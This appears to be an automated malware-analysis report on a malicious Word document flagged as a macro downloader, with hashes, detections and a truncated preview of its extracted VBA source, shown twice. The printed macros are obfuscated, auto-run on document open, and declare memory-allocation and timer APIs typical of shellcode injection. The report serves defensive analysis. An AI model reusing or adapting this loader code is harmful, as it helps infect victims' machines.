Office (OLE) malware analysis — malicious · 2d5bfe9cfa79dd9e

MALICIOUS

Office (OLE)

307.5 KB Created: 2018-02-12 14:05:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: d7e39db06ddce5e6a9982b55672a513b SHA-1: 2e256c733b3824c4ea7743e2e141203f0a400274 SHA-256: 2d5bfe9cfa79dd9ea3b36d7c052b8440d0ea113331b4f7c8f3f41a1b0fa7da52

122 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The ClamAV heuristic also flags it as a downloader. While the specific download URL is not directly present, the presence of macros and the downloader heuristic strongly suggest this attack pattern. No specific family could be identified.

Heuristics 4

ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9884 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9884 bytes
SHA-256: `2ea632ec5a61578c84d8e0988f682951bc994234a4d8c55c3a2412a58de5b8f1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() selfdenial recommendation = 53 + 3 Pmt 0, recommendation, 12303, 28962, 2 End Sub Attribute VB_Name = "nissan" #If (37 - 103 + 466 + 51 - 107 + 356) > ((114 - 95 + 301) - (48 - 3 + 495) * 1) And Not ((73 - 3 - 42) - (38 - 93 + 83)) * 2 < (Win64) Then Public Declare Function colinus _ Lib "Ntdll " Alias _ "NtAllocateVirtualMemory" (maure As Long, dreyfus As Long, ByVal curettage As Long, bichlorideByVal As Long, iridic As Long, ByVal bgirl As Long) As Long #End If Function deflect(after) #If (114 - 125 + 411 + 32 - 93 + 361) > ((128 - 70 + 262) - (77 - 91 + 554) * 1) And ((6 - 114 + 136) - (127 - 91 - 8)) * 2 < (Win64) Then Dim estoppel As LongPtr countywide = 65 - 126 + 69 Dim comburent As LongPtr Dim hampshire As LongPtr dipsacus = VarPtr(estoppel) bogtrotter = fijian(dipsacus, VarPtr(after) + (10 - 75 + 73), countywide) #End If #If (4 - 31 + 427 + 89 - 28 + 239) > ((128 - 77 + 269) - (91 - 40 + 489) * 1) And Not ((55 - 123 + 96) - (84 - 112 + 56)) * 2 < (Win64) Then Dim estoppel As Long countywide = 58 - 23 - 31 Dim comburent As Long Dim hampshire As Long dipsacus = VarPtr(estoppel) bogtrotter = puncuality(dipsacus, VarPtr(after) + (124 - 39 - 77), countywide) #End If comburent = 42 - 112 + 70 hampshire = 18 - 84 + 9905 antipsychotic = 39 - 101 + 4158 booze = 99 - 42 + 7 commelina = colinus(ByVal (91 - 126 + 34), _ comburent, _ ByVal (36 - 66 + 30), hampshire, _ ByVal antipsychotic, _ ByVal booze) puncuality comburent, estoppel, 38 - 101 + 5946 Pmt 0, (48 + 17), 20068, 10392, 3 deflect = comburent End Function Attribute VB_Name = "mustang" #If (44 - 73 + 429 + 73 - 10 + 237) > ((128 - 51 + 243) - (46 - 29 + 523) * 1) And ((128 - 45 - 55) - (99 - 71 + 0)) * 2 < (Win64) Then Public Declare PtrSafe Function colinus _ Lib "ntdll " Alias _ "NtAllocateVirtualMemory" (bridewell As LongPtr, bookmaker As LongPtr, ByVal oca As LongPtr, actualizedByVal As LongPtr, constituting As LongPtr, ByVal cock As LongPtr) As LongPtr #End If #If (37 - 103 + 466 + 51 - 107 + 356) > ((114 - 95 + 301) - (48 - 3 + 495) * 1) And Not ((73 - 3 - 42) - (38 - 93 + 83)) * 2 < (Win64) Then Public Declare Function rearguard _ Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (bedight As Any, ByVal confine As Any, ByVal microgramma As Any, ByVal insensibly As Any, ByVal experiment As Any, ByVal maildrop As Any, ByVal leymus As Any) As Long #End If Public Function superabat(cancan) As String Dim bawdyhouse(63) As Long Dim sundowner(6962) As Byte Dim chalcedony As Long Dim samara As Long Dim embellishment As Long Dim tightfitting(63) As Long Dim fixedness(63) As Long Dim osmanthus() As Byte Dim wotan As Long proctology = 11 - 58 + 262191 alongside = 70 - 72 + 257 meanings = 117 - 104 + 243 direction = 20 - 12 + 4088 qualification = 94 - 4 + 65446 cebidae = 103 - 49 + 10 evenhanded = 87 - 98 + 65291 severalty = 33 - 41 + 16711688 Dim hurl() As Byte hurl = VBA.StrConv(cancan, 120 + 8) miserere = 1 + 59 Pmt 0, miserere, 26798, 42787, 6 clamp = 7840 + 3 padre = vbKeyShift - 12 For attendance = (3 - 3) To clamp If attendance Mod 2 = (4 - 4) Then hurl(attendance) = hurl(attendance) - padre Else hurl(attendance) = hurl(attendance) - (padre - 1) End If Next attendance crumenal = 27 + 27 Pmt 0, crumenal, 9696, 24175, 6 backswimmer = stridor For chalcedony = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6) bawdyhouse(chalcedony) = insubordinate(chalcedony, cebidae, 47) fixedness(chalcedony) = insubordinate(chalcedony, direction, 47) tightfitting(chalcedony) = insubordinate(chalcedony, proctology, 47) Next chalcedony rosales = 6 + 29 Pmt 0, rosales, 39805, 48993, 7 osmanthus = hurl arbitrament = 21 + 51 Pmt 0, arbitrament, 9930, 52430, 4 christianity = 101 - ... (truncated)

SHA-256: 2ea632ec5a61578c84d8e0988f682951bc994234a4d8c55c3a2412a58de5b8f1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Open()
selfdenial
recommendation = 53 + 3
 Pmt 0, recommendation, 12303, 28962, 2
End Sub



Attribute VB_Name = "nissan"
#If (37 - 103 + 466 + 51 - 107 + 356) > ((114 - 95 + 301) - (48 - 3 + 495) * 1) And Not ((73 - 3 - 42) - (38 - 93 + 83)) * 2 < (Win64) Then
Public Declare Function colinus _
Lib "Ntdll  " Alias _
"NtAllocateVirtualMemory" (maure As Long, dreyfus As Long, ByVal curettage As Long, bichlorideByVal As Long, iridic As Long, ByVal bgirl As Long) As Long
#End If
Function deflect(after)
#If (114 - 125 + 411 + 32 - 93 + 361) > ((128 - 70 + 262) - (77 - 91 + 554) * 1) And ((6 - 114 + 136) - (127 - 91 - 8)) * 2 < (Win64) Then
Dim estoppel As LongPtr
countywide = 65 - 126 + 69
Dim comburent As LongPtr
Dim hampshire As LongPtr
dipsacus = VarPtr(estoppel)
bogtrotter = fijian(dipsacus, VarPtr(after) + (10 - 75 + 73), countywide)
#End If
#If (4 - 31 + 427 + 89 - 28 + 239) > ((128 - 77 + 269) - (91 - 40 + 489) * 1) And Not ((55 - 123 + 96) - (84 - 112 + 56)) * 2 < (Win64) Then
Dim estoppel As Long
countywide = 58 - 23 - 31
Dim comburent As Long
Dim hampshire As Long
dipsacus = VarPtr(estoppel)
bogtrotter = puncuality(dipsacus, VarPtr(after) + (124 - 39 - 77), countywide)
#End If
comburent = 42 - 112 + 70
hampshire = 18 - 84 + 9905
antipsychotic = 39 - 101 + 4158
booze = 99 - 42 + 7
commelina = colinus(ByVal (91 - 126 + 34), _
comburent, _
ByVal (36 - 66 + 30), hampshire, _
ByVal antipsychotic, _
ByVal booze)
puncuality comburent, estoppel, 38 - 101 + 5946
Pmt 0, (48 + 17), 20068, 10392, 3
deflect = comburent
End Function


Attribute VB_Name = "mustang"
#If (44 - 73 + 429 + 73 - 10 + 237) > ((128 - 51 + 243) - (46 - 29 + 523) * 1) And ((128 - 45 - 55) - (99 - 71 + 0)) * 2 < (Win64) Then
Public Declare PtrSafe Function colinus _
Lib "ntdll    " Alias _
"NtAllocateVirtualMemory" (bridewell As LongPtr, bookmaker As LongPtr, ByVal oca As LongPtr, actualizedByVal As LongPtr, constituting As LongPtr, ByVal cock As LongPtr) As LongPtr
#End If
#If (37 - 103 + 466 + 51 - 107 + 356) > ((114 - 95 + 301) - (48 - 3 + 495) * 1) And Not ((73 - 3 - 42) - (38 - 93 + 83)) * 2 < (Win64) Then
Public Declare Function rearguard _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (bedight As Any, ByVal confine As Any, ByVal microgramma As Any, ByVal insensibly As Any, ByVal experiment As Any, ByVal maildrop As Any, ByVal leymus As Any) As Long
#End If
Public Function superabat(cancan) As String
Dim bawdyhouse(63) As Long
Dim sundowner(6962) As Byte
Dim chalcedony As Long
Dim samara As Long
Dim embellishment As Long
Dim tightfitting(63) As Long
Dim fixedness(63) As Long
Dim osmanthus() As Byte
Dim wotan As Long
proctology = 11 - 58 + 262191
alongside = 70 - 72 + 257
meanings = 117 - 104 + 243
direction = 20 - 12 + 4088
qualification = 94 - 4 + 65446
cebidae = 103 - 49 + 10
evenhanded = 87 - 98 + 65291
severalty = 33 - 41 + 16711688
Dim hurl() As Byte
hurl = VBA.StrConv(cancan, 120 + 8)
miserere = 1 + 59
Pmt 0, miserere, 26798, 42787, 6
clamp = 7840 + 3
padre = vbKeyShift - 12
For attendance = (3 - 3) To clamp
If attendance Mod 2 = (4 - 4) Then
hurl(attendance) = hurl(attendance) - padre
Else
hurl(attendance) = hurl(attendance) - (padre - 1)
End If
Next attendance
crumenal = 27 + 27
Pmt 0, crumenal, 9696, 24175, 6
backswimmer = stridor
For chalcedony = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
bawdyhouse(chalcedony) = insubordinate(chalcedony, cebidae, 47)
fixedness(chalcedony) = insubordinate(chalcedony, direction, 47)
tightfitting(chalcedony) = insubordinate(chalcedony, proctology, 47)
Next chalcedony
rosales = 6 + 29
Pmt 0, rosales, 39805, 48993, 7
osmanthus = hurl
arbitrament = 21 + 51
Pmt 0, arbitrament, 9930, 52430, 4
christianity = 101 - 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.